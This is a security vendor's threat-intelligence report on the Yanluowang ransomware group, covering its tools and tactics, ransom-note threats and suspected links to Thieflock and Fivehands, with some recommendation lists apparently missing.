United States organizations within the financial sector are currently being attacked by a recently discovered ransomware operation named, Yanluowang. The ransomware operation is highly experienced with ransomware-as-a-service (RaaS) and could be linked to veteran RaaS groups, Fivehands and Thieflock. Although the group is primarily focused on attacking organizations within the financial sector, they have also targeted companies in manufacturing, IT services, consultancy, and engineering. Let’s take a look at Yanluowang’s techniques, tactics, and how they may be connected to Fivehands and Thieflock.
Important Note: As of now, the ransomware gang is named Yanluowang, as well as their ransomware. Therefore, the name Yanluowang will be used interchangeably throughout this report.
In October 2021, Symantec’s Threat Hunter Team, a division of Broadcom Software, discovered that Yanluowang ransomware was actively being used by a threat actor who was seen attacking U.S. corporations since at least August 2021. What was interesting about the attack was that many of the tools, tactics, and procedures (TTPs) used were previously used by ransomware threat actor, Thieflock. Most analysts assumed that the threat actor using Yanluowang must be an affiliate of Thieflock who shifted allegiances. Although Yanluowang attempted to attack a large organization in October 2021 by deploying ransomware, they were not successful due to the ransomware being somewhat underdeveloped.
According to Symantec, their Threat Hunter Team initially discovered the use of AdFind, a legitimate command-line Active Directory query tool, on the undisclosed target’s network. Ransomware attackers often use AdFind as a reconnaissance tool. The tool also equipped attackers with resources that they needed for lateral movement by way of Active Directory. Days after discovering the suspicious use of AdFind, attackers attempted to deploy Yanluowang ransomware.
Through research, Symantec observed the following precursor tools carrying out the below actions:
After Yanluowang is deployed, it carries out the following actions:
After further research, Symantec found that most of the time, the threat actors behind Yanluowang used PowerShell to download tools to compromised systems, using BazarLoader to assist in reconnaissance. They then enable RDP via registry so they can enable remote access. ConnectWise (a remote access tool) is deployed after attackers gain initial access.
AdFind and SoftPerfect Network Scanner (netscan.exe – a tool used for discovery of hostnames and network services) is used to perform lateral movement and identify systems of interest. The next phase of Yanluowang’s attack is credential theft by way of credential-stealing tools. These tools include:
Also, a number of open-source tools are used like KeeThief – a PowerShell script that copies the master key from KeePass. Yanluowang also uses customized versions of open-source credential dumping tools (secretdump.exe), which also aid in dumping credentials from the registry. Cobalt Strike Beacon was also seen deployed against at least one targeted organization.
Image 1: Yanluowang Ransom Note
Additionally, the threat actors behind Yanluowang leave behind a ransom note that warns victims not to contact law enforcement or ransomware negotiation firms. If they do, the attackers will conduct a distributed denial of service (DDoS) attack and make “calls to employees and business partners”. They’ve also threatened to repeat the attack in a matter of weeks and delete their victim’s data.
Many speculate that Yanluowang could be connected to Thieflock and Fivehands. After researchers looked into the tactics and techniques that Yanluowang uses, they noticed a possible connection to older attacks with Thieflock, which is a ransomware operation developed by the Fivehands ransomware group. Fivehands is a ransomware variant that has been used to steal information, obfuscate files, accomplish network discovery, and accomplish credential access. As of April 2021, Fivehands was used by threat actor UNC2447 to exploit a SonicWall software flaw before the flaw was fixed.
While Fivehands is relatively new to the ransomware scene, it is being linked to Yanluowang by researchers. When UNC2447 exploited SonicWall, they showed advanced capabilities to evade detection and minimize post-intrusion forensics – like Yanluowang. Also, Yanluowang relies on several tactics and techniques found in Fivehands ransomware such as using GrabFF , SoftPerfect Network Scanner, and the S3 browser and Cent browser to upload and download data.
Researchers and analysts are curious about the connection between Yanluowang, Thieflock, and Fivehands, but right now, there isn’t a ton of evidence confirming a connection between Yanluowang, Thieflock, and Fivehands. Researchers still stand firm on their belief that the cyber criminals behind Yanluowang could just have a former affiliate of Thieflock in their arsenal.
Because law enforcement is cracking down on ransomware operations, there are many new variants that have surfaced over the year. Many new strains have been used in double-extortion attacks where attackers encrypt stolen data and threaten to leak it if demands aren’t honored. In October alone, 314 organizations worldwide became the victims of double-extortion attacks with the worst offenders being Conti, LockBit, Hive, and BlackMatter.
Yanluowang’s goal is to locate and steal as much information (passwords, usernames, etc.) as possible to use against their victims. Their ransom note indicates the threat of double extortion if victims don’t comply with their demands. If organizations are going to protect themselves from threat actors like Yanluowang who will stop at nothing for financial gain, it’s important to become familiar with their tactics and techniques.
Research from the U.S. Financial Crimes Enforcement Network (FinCEN) discovered that payments linked to ransomware attacks amount to $590 million in 2021. This exceeds the total for 2020 and is continuing to rise. Because the cyber landscape is always changing, it’s imperative to be aware of new cyber attack strategies and techniques. Avertium is here to keep you informed and to keep your organization safe. We recommend the following for the best protection against ransomware attacks:
Recommendations from Avertium and our partner, Advanced Intelligence:
If your organization is impacted by a ransomware attack, the FBI and CISA recommend the following:
DDoS - disruption to internet-based services that can make any internet connected machine unavailable to perform its intended purpose.
PowerShell – used for automating the management of systems. Can also be used to build, test, and deploy solutions, often in CI/CD environments.
Ransomware - malicious software that infects a device and stops users from accessing data and files until a ransom is paid.
RDP - technical standard for using a desktop computer remotely.
This document and its contents do not constitute and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be utilized to ensure that diligent measures are taken to lower the risk of potential weaknesses be exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of the Client's compliance with any law, regulation, or standard.